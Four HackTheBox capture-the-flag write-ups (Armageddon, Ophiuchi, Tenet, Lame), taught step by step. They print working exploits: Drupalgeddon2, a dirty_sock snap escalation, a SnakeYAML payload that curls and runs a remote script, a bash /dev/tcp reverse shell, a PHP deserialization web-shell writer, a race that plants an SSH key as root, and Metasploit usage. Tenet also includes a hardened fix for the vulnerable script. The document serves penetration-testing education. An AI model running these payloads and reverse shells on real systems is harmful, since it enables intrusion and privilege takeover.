Armageddon – HackTheBox Machine | Writeup

Info

Armageddon is an easy Linux-based machine, created by bertolis.

Enumeration

Let’s run a network scan to check open ports and service versions.

Scanning Result

The SSH and HTTP ports are open. We should be able to visit the page on 10.10.10.233.

Login Page

And yes, there is a login page. Let’s explore it. The page itself shows nothing interesting, but the page source and Wappalyzer do…

Found Drupal Version
Wappalyzer Result

Exploitation

That was easy to discover. Drupal 7.x has multiple known vulnerabilities, including PHP object injection and remote code execution. Let’s google it.

Drupalgeddon2 Exploit

The exploit name is very similar to Armageddon. Too easy if it’s the correct one. Let’s git clone it and run it. The repository has a very good explanation of how to use it; check it on GitHub here.

Downloading Exploit

Before running it, make sure you have installed the highline gem.

sudo gem install highline

And then run the exploit.

./drupalgeddon2.rb http://10.10.10.233/
Getting Shell

And we got it. But there is no user.txt, which means we need to explore further.

User Escalation

Since we can’t use the cd command in this shell, we need to explore manually (ls /some/path or cat /some/path/file.txt).

Files

An interesting directory is sites, where we may find credentials.

MySQL Credentials

And we found them. Let’s connect to MySQL with these credentials. We can’t connect from our local machine, so let’s log in from the shell we got. Since we can’t get an interactive MySQL shell, we will run single MySQL commands with -e.

mysql -u [Username] -p[Password] -e "[Command to execute..]"
mysql -u drupaluser [email protected]*m23gBVj -e 'show databases'
Single MySQL Command

And we can see the drupal database; let’s check its tables.

mysql -u drupaluser [email protected]*m23gBVj -D drupal -e 'show tables'

And the users table is there! Let’s check it.

mysql -u drupaluser [email protected]*m23gBVj -D drupal -e 'SELECT * FROM users'
Users

There are password hashes and usernames. The first one, brucetherealadmin, has an email set, [email protected], and that email is different from the others, so he might be the main user. We will try to crack these hashes with john.

Cracked Password

I have already done this machine, so I’ll just show the password john cracked earlier. The cracking command is in the image. Now that we have credentials, let’s log in: brucetherealadmin:booboo

User

Got user! Now, let’s own root.

Root Escalation

First, we’ll check sudo capabilities.

Sudo Capabilities

We can run snap install without a password! Great, we can find an exploit to escalate privileges with snap. Let’s google it.

Results

We will check the first one, named dirty_sock, on GitHub. Clone it to your local machine.

Downloading Exploit

I tried to transfer both scripts to the target machine, but it didn’t work. We need to install it on the target machine manually. Looking at the scripts, I found this in dirty_sockv2.py:

dirty_sockv2.py

So we’ll copy this, write it out on the target machine as a .snap installation file, and install it there. We will use this command on the target machine to create the snap file:

python3 -c 'print("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" + "A"*4256 + "==")' | base64 -d > installation.snap

And then,

sudo /usr/bin/snap install --devmode installation.snap

The --devmode flag lets users install snaps without enforcing the snap’s security policies (confinement).

Installed

We will read README.md now to see how to use it.

README.md

Okay, so we need to become dirty_sock user. Let’s do this.

Changing User

Yay! We are dirty_sock! If you get an error that the user doesn’t exist, just reset the machine; I had the same problem. Now we will try to become root. Just type sudo su.

Root

Wooah, we got root! If it asks you for a password, use dirty_sock as the password.

PWNED!

Thank you for reading this writeup. If you want to support my work:

Hack The Box Buy Me A Coffee GitHub Discord

Ophiuchi – HackTheBox Machine | Writeup

Info

Ophiuchi is a medium Linux-based machine, created by felamos.

Enumeration

First of all, I’ll run a port scan to find out which ports are open and the service versions.

Scanning Result

And we see 2 open ports: SSH and HTTP. Let’s visit the page on port 8080.

Page on 8080 Port

We found an Online YAML Parser. Nothing interesting in the page source, so I’ll simply google YAML exploit.

Results

As always, I click on the first result. This time it is SnakeYaml Deserialization, and I will read that article.

SnakeYaml Deserialization

The author of that article has already created the exploit payload, described in a GitHub article. Read it. Now we can use that payload on our machine’s YAML parser. First, start a Python HTTP server to see whether the payload reaches it.

Now, hit PARSE.

Result

Wooah! It works! The payload reached our server. I tried to get a reverse shell this way, but it didn’t work. Let’s search for a YAML payload.

YAML Payload

I found this one, which uses the same exploit we used. We may be able to abuse it with this YAML payload and get a reverse shell. Git clone it.

git clone https://github.com/artsploit/yaml-payload.git

Exploitation

After a short look around, we can see the AwesomeScriptEngineFactory.java file:

package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
            Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}

We can use this class to get a reverse shell. How?

 Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
 Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");

I tried to get a reverse shell directly from this exploit, but it didn’t work. We need to create a bash reverse shell file and then call it.

bash -c 'bash -i >& /dev/tcp/10.10.14.90/4444 0>&1'

Now, let’s modify the Runtime.getRuntime().exec calls in the exploit.

Runtime.getRuntime().exec("curl 10.10.14.90:1234/rev.sh -o /tmp/rev.sh");
Runtime.getRuntime().exec("bash /tmp/rev.sh");

The first call transfers the reverse shell script to the server, and the second runs it there. Now, to prepare our exploit, we need to compile it since it is written in Java; javac and jar do that. Go to the main directory (yaml-payload) of the cloned repository so we can compile the entire directory.

javac src/artsploit/AwesomeScriptEngineFactory.java
jar cvf exploit.jar -C src/ .

Now we will again start our Python server and a netcat listener on port 4444, then run the same payload on the page on port 8080.

Getting Shell

And we got a shell as the tomcat user. We don’t have permission to read user.txt. Let’s escalate to a user.

User Escalation

Now that we have a shell, it’s time for escalation. Let’s find how many users there are.

Only admin, and user.txt is there. But we don’t have permission to read it. Since the SSH port is open, I think we need to find creds for an SSH login. We are tomcat, and creds might be in the configuration directory. By default, these files are located in TOMCAT-HOME/conf. So just type cd to go to the default tomcat home directory.

Okay, we can see there is a conf directory. Enter it and explore.

I immediately noticed tomcat-users.xml and tomcat-users.xsd. I’ll read both of them.

Credentials Found

And we found creds for a user in tomcat-users.xml. Let’s try to SSH in with these creds. Username: admin Password: whythereisalimit

User

We got user! It’s time for root!

Root Escalation

First let’s check sudo capabilities with sudo -l:

Sudo Capabilities

We can see an index.go file, so let’s check what it does.

First, it reads main.wasm and checks the returned value: if it is not equal to 1, it’s not ready to deploy, otherwise it is ready. Since main.wasm is not readable, I’ll transfer it to my machine and try to analyze it. On your local machine, run:

rsync -e "ssh" [email protected]:/opt/wasm-functions/main.wasm /path/to/save
Transfer main.wasm

WASM is WebAssembly; you can read more about it here. To read main.wasm, we need to decode it. How? We will use wasm2wat. This tool converts a WebAssembly binary into S-expressions: it is a command line tool that takes a binary file as input and generates an output file containing the readable text. More about advanced WebAssembly tools can be found here. I will use an online wasm2wat tool; click here for it.

Wasm2Wat

We need to change the 0 to 1 (we saw that the index.go script checks whether it equals 1). Now copy that; we need wat2wasm to convert it back to wasm. We will use that tool on the same site; click here for it.

Wat2Wasm

Download it, rename it to main.wasm, start a Python server and then transfer it to the machine.

Now let’s run it and see what happens.

sudo /usr/bin/go run /opt/wasm-functions/index.go

And it’s ready to deploy. We will abuse deploy.sh by appending a line that writes our public key to root’s authorized_keys, and then we will be able to connect as root with SSH.

echo 'echo "ssh-rsa AAAAB==========your_public_key==========" > /root/.ssh/authorized_keys' >> deploy.sh

And then run the index.go script again.

And now you should be able to connect as root with SSH.

Root

PWNED!


Tenet – HackTheBox Machine | Writeup

Info

Tenet is a medium Linux-based machine, created by egotisticalSW.

Enumeration

First of all, I’ll run a port scan to find out which ports are open and the service versions.

Scanning Result

Only two ports are open: 22 (SSH) and 80 (HTTP). Since port 80 is open, we should be able to visit the page. Let’s type the machine’s IP in our browser and go.

Page on Port 80

And we can see it is the Apache2 default page; nothing interesting here. Let’s try adding tenet.htb (the default domain name on HTB machines is usually machine.htb) to our local hosts file (/etc/hosts).

sudo nano /etc/hosts

Nano is a text editor; we’ll use it. With the command above, you open your local hosts file. Now we can add the machine IP and domain. Add this to /etc/hosts:

10.10.10.223    tenet.htb

Save it, and then type tenet.htb in the browser to see what we get. We get a WordPress page (you can see WordPress in the footer). Now let’s enumerate this site. Enumerating it, I found “Recent Comments” with “neil” as the author of the comment. It might be a username. Let’s see what the comment says:

Recent Comments

I continued enumerating the site, but found nothing else interesting. Since Neil is talking about a migration, there may be another host called sator. We’ll try to reach it. Open your /etc/hosts and do the same as before, but this time add sator.tenet.htb. After that, let’s go to the site. It’s again the Apache2 default page. Let’s try a random path (write anything after the slash: www.test.com/123test123) and the error page should tell us which server we are on.

And we got it: we are on sator.tenet.htb. Let’s explore it by trying some other paths. Neil mentioned backups, so I tried sator.tenet.htb/backups, but nothing. I tried some other paths, still nothing. Let’s try sator.php now; maybe we get something if it exists on the server.

It exists! But unfortunately we are not able to read the source of that file. Neil mentioned that the backups were not removed, and sator.php might be among them. Let’s try to download it by adding .bak to the end of the name. “.bak” is a filename extension commonly used to signify a backup copy of a file: More About .BAK.

Downloading File

And yes, it worked. They really should delete these backups, haha.

Exploitation

Let’s read this file; open it with your text editor.

File Content

Here we see that the script takes a GET parameter arepo and passes it to unserialize(). We might be able to exploit it using PHP object deserialization; you can read more about it here: Exploiting PHP Deserialization. There is a class called DatabaseExport with a __destruct method implemented, and that method is what we can use to get RCE: it uses file_put_contents to write the property data to the file named in the property user_file. If we go to the URI sator.tenet.htb/users.txt, we see that the file exists and prints SUCCESS. So we need to create an exploit that will spawn a shell.

<?php
class DatabaseExport
{
    // Same class and property names as in sator.php, so the serialized object
    // is accepted by unserialize(); the payload lands in exploit.php next to sator.php
    public $user_file = 'exploit.php';
    public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.XX.XX/1234 0>&1\'"); ?>';
    public function __destruct()
    {
        file_put_contents(__DIR__ . '/' . $this->user_file, $this->data);
    }
}
// First request delivers the serialized object; when sator.php finishes,
// PHP destroys the object and __destruct() writes the file
$url = 'http://10.10.10.223/sator.php?arepo=' . urlencode(serialize(new DatabaseExport));
$response = file_get_contents($url);
// Second request runs the file we just wrote, which connects back to our listener
$response = file_get_contents("http://10.10.10.223/exploit.php");
?>

Don’t forget to change the IP address. Once we have the exploit, we need to start an nc listener and run it.

nc -nlvp 1234

And run the exploit in another tab.

php exploit.php
Connection Received

And we got a connection! Now let’s spawn a Python shell.

Shell Spawned

And we got our shell! We are the web user.

User Escalation

We saw that the site is based on WordPress, so let’s find wp-config.php, where the credentials should be. We are in the /var/www/html directory, and when we list files we can see the wordpress folder.

User Credentials

We found credentials. The SSH port is open, so we can connect via SSH.

SSH User

And we got user via SSH. Now, grab the user flag, and paste it to HTB.

Root Escalation

We check what sudo capabilities our user has using:

sudo -l
Sudo Capabilities

We can see that we can run /usr/local/bin/enableSSH.sh; let’s read it.

cat /usr/local/bin/enableSSH.sh

And we got:

#!/bin/bash

checkAdded() {
	sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3)
	if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then
		/bin/echo "Successfully added $sshName to authorized_keys file!"
	else
		/bin/echo "Error in adding $sshName to authorized_keys file!"
	fi
}

checkFile() {
	if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then
		/bin/echo "Error in creating key file!"
		if [[ -f $1 ]]; then /bin/rm $1; fi
		exit 1
	fi
}

addKey() {
	tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
	(umask 110; touch $tmpName)
	/bin/echo $key >>$tmpName
	checkFile $tmpName
	/bin/cat $tmpName >>/root/.ssh/authorized_keys
	/bin/rm $tmpName
}

key="ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl [email protected]"
addKey
checkAdded

With this script we can get our own public SSH key into root’s authorized_keys. You need either to create a new key pair or to use an existing one. We will create new ones; on your local machine type:

ssh-keygen

Just press ENTER and don’t add a passphrase. If it asks you to overwrite, press y and ENTER. The default location of SSH keys is /home/username/.ssh, so let’s cd into it and copy our public key (id_rsa.pub).

SSH Public Key

Now copy it and go to the box. We will create a simple script that keeps writing our public key into the temporary /tmp/ssh* files enableSSH.sh uses, so it ends up in /root/.ssh/authorized_keys and we can SSH in as root. On the box, open a text editor (in my case nano) and make the script with the public key you copied.

while true;
do echo "ssh-rsa YOURKEY" | tee /tmp/ssh* > /dev/null;
done
Script

Now, add executable permissions to exploit.sh:

chmod +x exploit.sh

Now connect again as neil via SSH in a new tab, so we can run exploit.sh and enableSSH.sh at the same time. When you’re connected, run exploit.sh:

bash exploit.sh

Now, in another tab, run enableSSH.sh multiple times, with sudo:

sudo /usr/local/bin/enableSSH.sh

Run that command multiple times until you can connect via SSH. In my case, I ran it more than 50 times before I successfully connected as root. When you have run it enough times, try to connect as root:

ssh -i id_rsa [email protected]

This time we are using the private key (id_rsa) to connect. If you have tried many times and still fail, try resetting the box.
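The race exists because mktemp -u only chooses a name, the file is then created under umask 110 (mode 0666, world-writable) and only afterwards copied into authorized_keys, which is the window the loop above wins. Below is a hardened rewrite of the addKey/checkFile logic, added here as an example and not the box’s own script; the authorized_keys path is passed in, and the key and file used in the demo are constructed.

```shell
# Hardened rewrite of enableSSH.sh's addKey/checkFile (added example, not the
# box's script). Each "was:" comment names the line of the original it replaces.

valid_pubkey() {
    # Accept exactly one line of the form "<type> <base64> [comment]" so the
    # appended text cannot smuggle in a second key or anything else.
    [ "$(printf '%s' "$1" | wc -l | tr -d ' ')" = 0 ] || return 1
    printf '%s\n' "$1" | grep -Eq \
        '^(ssh-rsa|ssh-ed25519|ecdsa-sha2-nistp(256|384|521)) [A-Za-z0-9+/]+=*( [^[:space:]]+)?$'
}

safe_add_key() {
    # $1 = public key line, $2 = authorized_keys file to append to
    key=$1; target=$2
    valid_pubkey "$key" || { echo "rejected: not a single public key line" >&2; return 1; }
    umask 077                                    # was: umask 110 (left the file 0666)
    tmp=$(mktemp /tmp/ssh-XXXXXXXX) || return 1  # was: mktemp -u; this creates the file now, 0600, ours
    printf '%s\n' "$key" > "$tmp"                # was: /bin/echo $key >>$tmpName (unquoted, appending)
    # Re-read before trusting: the file is private to us, so a mismatch means
    # something is badly wrong, not merely that someone raced us.
    if [ "$(cat "$tmp")" != "$key" ]; then rm -f "$tmp"; return 1; fi
    cat "$tmp" >> "$target" && rm -f "$tmp"
}

key_is_authorized() {
    # $1 = key line, $2 = authorized_keys file: exact whole-line match instead
    # of the original checkAdded's substring grep on the comment field
    grep -qxF -- "$1" "$2"
}

# Demo with a constructed key and a throwaway authorized_keys file
DEMO_AK=$(mktemp)
DEMO_KEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDemoKeyNotARealKey0123456789abcdefghijklmnop demo@example'
safe_add_key "$DEMO_KEY" "$DEMO_AK" && key_is_authorized "$DEMO_KEY" "$DEMO_AK" && echo "added: $DEMO_KEY"
rm -f "$DEMO_AK"
```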

Root

PWNED!


Lame – HackTheBox Machine | Writeup

Info

Lame is the first box ever created on HackTheBox. It’s an easy Linux-based machine created by ch4p.

Enumeration

Since this machine is retired and only VIP members can access it, I have a different machine IP. You can find the machine IP on that machine’s page. For this machine you need basic Linux knowledge. As always, I start with a network scan to see which ports are open, service versions, etc.

nmap -sC -sV 10.10.10.3
Explanation for Parameters
Scanning Result

Exploitation

In the scan result we can see FTP details, and anonymous login is allowed. The FTP version “vsFTPd 2.3.4” is also shown. Googling it, I found VSFTPD v2.3.4 Backdoor Command Execution and tried to run it, but nothing. It might be a rabbit hole. After attempting to get in using the vsFTPd attack vector, Samba becomes the only target. Googling it for an exploit, I clicked on the first result, Samba “username map script” Command Execution (Rapid7), and it’s exploitable with Metasploit. The exploit’s version matches ours too. So I’ll run the Metasploit console and try this one.

msfconsole

And now I’ll use the search command to find that exploit.

Search Command in Metasploit Console

Found it! Let’s use it:

use exploit/multi/samba/usermap_script

Now that we have loaded our exploit, let’s take a look at its options with the command:

show options
Options for Exploit

Okay, we have options! Now let’s set them properly. RHOSTS needs the machine IP. RPORT we shouldn’t change; it’s set by default to 139. LHOST is our local machine IP, actually our VPN connection IP. You can check it by typing:

ifconfig
Local Machine IP

Your local machine IP (on HackTheBox) should look like 10.10.XX.XX. Now we can set LHOST in the Metasploit console to the local machine IP:

set LHOST 10.10.XX.XX

Now let’s set RHOST (machine IP):

set RHOST 10.129.159.5
Exploit Options

And now let’s run it and see what happens. Use the command:

run

Wait a few seconds, and…

Shell Session

And we got it! Now we can grab our flags and submit them. On HTB Linux machines, the user flag is always in the user’s home directory (/home/username/user.txt) and the root flag is always in root’s directory (/root/root.txt). To get user, go into /home and you can see 4 users there. I checked all of them, and only the user makis has a user.txt file. To get root, simply read /root/root.txt.

User & Root

PWNED!
